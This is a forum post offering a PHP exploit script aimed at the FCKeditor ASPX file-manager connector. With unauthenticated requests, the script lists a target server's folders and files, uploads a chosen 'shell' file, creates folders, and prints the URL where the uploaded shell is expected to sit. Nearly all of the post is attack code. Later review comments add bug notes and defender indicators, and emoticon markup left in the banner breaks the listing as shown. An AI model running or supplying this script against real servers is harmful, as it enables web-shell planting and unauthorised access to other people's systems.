
[Exploit] FCK editor


#1
Dr. Spic

Dr. Spic

<?php
/** Remove PHP's execution time limit so slow remote requests do not abort the run **/
set_time_limit(0);
/** Error reporting: the call is commented out, so the configured reporting level applies **/
//error_reporting(0);
/** Target base URL, read from the first command-line argument.
    NOTE(review): there is no check that the argument was supplied, and the value is
    later concatenated directly with 'fckeditor/', so it presumably has to end in '/'. **/
$site = $argv[1];
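/**
 * Send an HTTP POST request with cURL and return the raw response.
 *
 * CURLOPT_HEADER is enabled, so the returned string holds the response
 * headers followed by the body.
 *
 * @param string $url  Request URL.
 * @param array  $data POST fields, handed unchanged to CURLOPT_POSTFIELDS.
 * @return string|false Response text, or false when the transfer failed.
 */
function CurlPost($url='localhost',$data=array())
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    // Certificate verification was switched off in the original while host
    // verification stayed on, which left the TLS peer unauthenticated.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 50);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

    $response = curl_exec($ch);
    // The original returned before reaching curl_close(), so the handle was
    // never released; close it first, then hand back the result.
    curl_close($ch);

    return $response;
}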
/**
 * Reduce a matched listing fragment to the bare entry name.
 *
 * Removes the literal prefixes '<Folder name="' and '<File name="' and then
 * every remaining double quote from the given string.
 */
function AppropriateName($FileName)
{
    // str_replace() applies the search strings in array order, matching the
    // innermost-to-outermost order of the nested calls it replaces.
    $markup = array('<Folder name="', '<File name="', '"');

    return str_replace($markup, '', $FileName);
}
/** Initializing: print an ASCII-art banner followed by the author credits **/
/** NOTE(review): the banner line containing <img src='...'> is forum emoticon markup
    inserted when the post was rendered. Its single quotes terminate the string literal
    early, so the listing as shown on this page is not valid PHP. **/
echo '					  ______
				   .-"	  "-.
				  /		    \
				 |			  |
				 |,  .-.  .-.  ,|
				 | )(__/  \__)( |
				 |/	 /\	 \|
	   (@_	   (_	 <img src='http://www.toolbase.bz/board/public/style_emoticons/<#EMO_DIR#>/_0021_^^.png' class='bbc_emoticon' alt='^^' />	 _)
  _	 ) \_______\__|IIIIII|__/__________________________
(_)@8@8{}<________|-\IIIIII/-|___________________________>
	    )_/	    \		  /
	   (@		   `--------`',"\n\n";
echo '/--------------------------------------------------------------\\',"\n";
echo '| Exploit by Yashar shahinzadeh & Mormoroth ',"\n";
echo '| Credit goes for http://ha.cker.ir & http://y-shahinzadeh.ir ',"\n";
echo '\--------------------------------------------------------------/',"\n\n";
/** Print the target and announce the existence check **/
echo '['.date("H:i:s").'] Site: ',$site,"\n";
echo '['.date("H:i:s").'] Checking whether if the fckeditor exists or not...',"\n";
/** Request <site>fckeditor/ and keep the response header lines **/
$CheckFCK = get_headers($site.'fckeditor/');
/** Only a status line containing '404' counts as "not found". Every other status
    (a redirect or a 403, for example) falls through to the "found" message, so that
    message does not show that the file-manager connector is reachable.
    NOTE(review): get_headers() returns false on failure, which is not handled here. **/
if(strstr($CheckFCK[0],'404')!==FALSE)
{
echo '['.date("H:i:s").'] fckeditor/ path not found',"\n";
exit();
}
/** No 404 was returned for the fckeditor/ path **/
echo '['.date("H:i:s").'] The path seems to be existed...',"\n";
/** Menu: each option maps to one command of the FCKeditor ASPX file-manager
    connector (GetFoldersAndFiles, FileUpload, CreateFolder). None of the requests
    built below carries credentials or a session cookie, so they only succeed where
    the connector answers unauthenticated callers.
    Defender note: requests to .../connectors/aspx/connector.aspx with a Command=
    query parameter are what this script leaves in web-server logs; disabling or
    access-controlling the connector removes what it depends on. **/
echo '['.date("H:i:s").'] What do you want to do? [(1)Getting folders and files,(2)Upload a file,(3)Create a folder] ';
$method = fopen('php://stdin','r');
$method = trim(fgets($method));
switch($method)
{
case '1':

echo '['.date("H:i:s").'] Please enter a path? ';
$path = fopen('php://stdin','r');
$path = trim(fgets($path));

/** Listing URL; the entered path is appended to the query string without URL-encoding **/
$GetFilesAndFoltersURL = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder='.$path;

echo '['.date("H:i:s").'] Gathreing...',"\n";

/** Fetch the connector response.
    NOTE(review): a false return from file_get_contents() is not checked. **/
$content = file_get_contents($GetFilesAndFoltersURL);

/** File(s): collect every <File name="..." fragment from the response **/
preg_match_all("/(<File name=\").*?(\")/is",$content,$files);

/** Folder(s): collect every <Folder name="..." fragment from the response **/
preg_match_all("/(<Folder name=\").*?(\")/is",$content,$folders);
echo '['.date("H:i:s").'] Found ',count($folders[0]),' folder(s) and ',count($files[0])," file(s)\n\n";
sleep(1);

echo '/--------------------------------------------------------------\\',"\n";

/** Printing folder(s) **/
foreach($folders[0] as $FileName)
{
  echo '| [Folder] '. AppropriateName($FileName),"\n";
}

/** Printing file(s) **/
foreach($files[0] as $FileName)
{
  echo '| [File] '. AppropriateName($FileName),"\n";
}
echo '\--------------------------------------------------------------/',"\n\n";

break;
case '2':

  /** Name of a local file, read from stdin; it must exist in the current directory **/
  echo '['.date("H:i:s").'] Please provide a shell name: ';
  $ShellName = fopen('php://stdin','r');
  $ShellName = trim(fgets($ShellName));
 
  /** Destination folder, appended to the upload URL as CurrentFolder **/
  echo '['.date("H:i:s").'] Please enter a path? ';
  $path = fopen('php://stdin','r');
  $path = trim(fgets($path));

  /** Stop if the local file is missing **/
  if(file_exists($ShellName)===FALSE)
  {
   echo '['.date("H:i:s").'] File does not exist in current directory!',"\n";
   exit();
  }else echo '['.date("H:i:s").'] Shell loaded...',"\n";
 
  /** Upload data: a single POST field named NewFile **/
  $data['NewFile'] = '@'.$ShellName;
 
  /** Upload URL (FileUpload command of the connector) **/
  $UploadURL = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder='.$path;
 
  echo '['.date("H:i:s").'] Uploading shell...',"\n";
 
  /** The return value of CurlPost() is discarded, so the connector's answer is
      never inspected **/
  CurlPost($UploadURL,$data);
 
  /** Host part of the target URL, used to print the assumed location **/
  $PureSit = explode('/',$site);
 
  /** The URL printed here is assembled locally and shown whether or not the upload
      was accepted; the /uploadFiles/File/ prefix is hard-coded.
      Defender note: unexpected files under that upload directory, and script
      execution being permitted there, are the conditions to look for and remove. **/
  echo '['.date("H:i:s").'] SHELL: http://',$PureSit[2],'/uploadFiles/File/',$path,$ShellName,"\n";

break;
case '3':

  echo '['.date("H:i:s").'] Please enter a path? ';
  $path = fopen('php://stdin','r');
  $path = trim(fgets($path));

  echo '['.date("H:i:s").'] Provide folder name: ';
  $name = fopen('php://stdin','r');
  $name = trim(fgets($name));
  /** CreateFolder URL; path and folder name are appended without URL-encoding **/
  $CreateFolder = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder='.$path.'&NewFolderName='.$name;

  echo '['.date("H:i:s").'] Creating...',"\n";

  /** Send the request. The response is stored but never examined, so the success
      message below is printed unconditionally. **/
  $content = file_get_contents($CreateFolder);
  echo '['.date("H:i:s").'] Folder was created successfully.',"\n";
  sleep(1);

break;
}
